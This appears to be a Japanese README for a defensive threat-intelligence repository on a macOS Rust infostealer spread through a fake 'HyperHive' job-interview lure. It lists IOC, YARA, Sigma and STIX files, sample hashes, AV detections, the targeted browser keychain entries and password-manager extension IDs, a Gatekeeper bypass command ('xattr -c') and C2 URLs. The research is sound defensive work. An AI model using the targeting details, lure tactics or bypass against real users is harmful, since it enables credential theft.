olkbchllhcflpbjfgagahpkjnjioiedg omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo ppdadbejkmjnefldpcdjhnkpbjkikoip
バージョン更新についてはCHANGELOG.mdを参照してください。
ガイドライン、Issueテンプレート、PRチェックリストについてはCONTRIBUTING.mdを参照してください。
分析テキストとスクリプトはMITライセンスの下で公開されています。IOCリストと脅威インテリジェンスコンテンツは防御目的で提供されており、ライセンス条件に基づき商用製品での再利用が許可されています。
サンドボックス環境での独立したリバースエンジニアリング。暗号化された設定は静的解析とヘルパーごとのCPUエミュレーションによって復元されました。scripts/decrypt_all.pyとSECURITY.mdを参照してください。
| ファイル | 形式 | 目的 |
|---|
iocs.txt | プレーンテキスト | ハッシュ, ドメイン, URL, IP, メール, Sentry ID — ブロックリスト, MISP, OpenCTIに貼り付け |
yara_rules.yar | YARA 4.2+ | 既知のサンプルハッシュマッチ + Mach-O用ヒューリスティック文字列検出 |
sigma_rules.yml | Sigma | プロキシ, DNS, プロセス作成ルール — SIEMに合わせてlogsourceを調整 |
stix/bundle.json | STIX 2.1 | 指標, マルウェアSDO, インフラ, ATT&CKパターン, 関係性を含む機械可読CTIバンドル |
attack-navigator-layer.json | ATT&CK Navigator | 視覚的なテクニックカバレッジのために[ATT&CK Navigator]にインポート(https://mitre-attack.github.io/attack-navigator/) |
| 要素 | 詳細 |
|---|
| プラットフォーム | Wellfound (AngelList) — 正規の求人ボード |
| 会社名 | "HyperHive" (単数形) / ドメイン hyperhives.net |
| ペルソナ | "Felix" |
| 連絡先メール | [email protected] |
| 信頼構築 | 対象者の実際の履歴書、LinkedIn、特定の技術スキルを参照 |
| 口実 | "面接前に製品を確認してください" |
| ペイロード発動条件 | hyperhives.net で "設定 → 診断 → ログ" を確認 |
| スケジュール設定 | 偽の面接枠 (4月8日 15:00 UTC) で緊急性を維持 |
| マルチステップチェーン | ペイロード配信前に少なくとも2日間にわたる2通のメール |
| プロパティ | 値 |
|---|
| ファイル | installer_binary |
| サイズ | 8,504,768 バイト |
| フォーマット | Mach-O Universal (x86_64 + arm64) |
| SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| SHA-1 | 2de897066c2fc7db91da78d7f9ded99237345077 |
| MD5 | 0e95ab4038ec48657563c96bed840dd5 |
| コンパイラ | rustc 1.87.0 (安定版) |
| ビルドユーザー | rootr (埋め込みパス /Users/rootr/.cargo/registry/... から) |
| ビルドコードネーム | force |
| ビルドバージョン | 9.12.1 |
| エラートラッキング | Sentry Rust SDK v0.36.0 |
| クレート数 | 97 (output/cargo_dependencies.txt を参照) |
| エンジン | 検出名 |
|---|
| Kaspersky | HEUR:Trojan-PSW.OSX.HashBreaker.e |
| DrWeb | Mac.PWS.JobStealer.1 |
| ESET-NOD32 | OSX/PSW.Agent.BX Trojan |
| Microsoft | Trojan:MacOS/Stealer!AMTB |
| Avast / AVG | MacOS:Stealer-BU [Trj] |
| Elastic | Malicious (high Confidence) |
| Cynet | Malicious (score: 99) |
| SentinelOne | Static AI - Suspicious Mach-O |
| ブラウザ | データパス | キーチェーンエントリ |
|---|
| Chrome | Google/Chrome | Chrome Safe Storage |
| Brave | BraveSoftware/Brave-Browser | Brave Safe Storage |
| Opera | デフォルト | Opera Safe Storage |
| Opera GX | デフォルト | Opera Safe Storage 2023 |
| Vivaldi | デフォルト | Vivaldi Safe Storage |
| Microsoft Edge | デフォルト | Microsoft Edge Safe Storage |
| Arc | Arc/User Data | — |
| CocCoc | デフォルト | CocCoc Safe Storage |
| 製品 | 拡張機能ID(例) |
|---|
| 1Password | aeblfdkhhhdcdjpifhhbdiojplfjncoa, khgocmkkpikpnmmkgmdnfckapcdkgfaf, gejiddohjgogedgjnonbofjigllpkmbf |
| ProtonPass | ghmbeldphafepmbegfdlkpapadhbakde |
| Dashlane | fdjamakpfbbddfjaooikfcpapjohcfmg |
| Deloitte Credentials | 企業認証情報ストア |
force_mode| Gatekeeperバイパス | ダウンロードしたバイナリに対して xattr -c |
| VPN認識 | "VPNを使用して再試行してください" エラーメッセージ |
https://cloudproxy.link/m/decode | 命令 / 設定チャネル |
https://cloudproxy.link/db/debug | デバッグ / 診断 |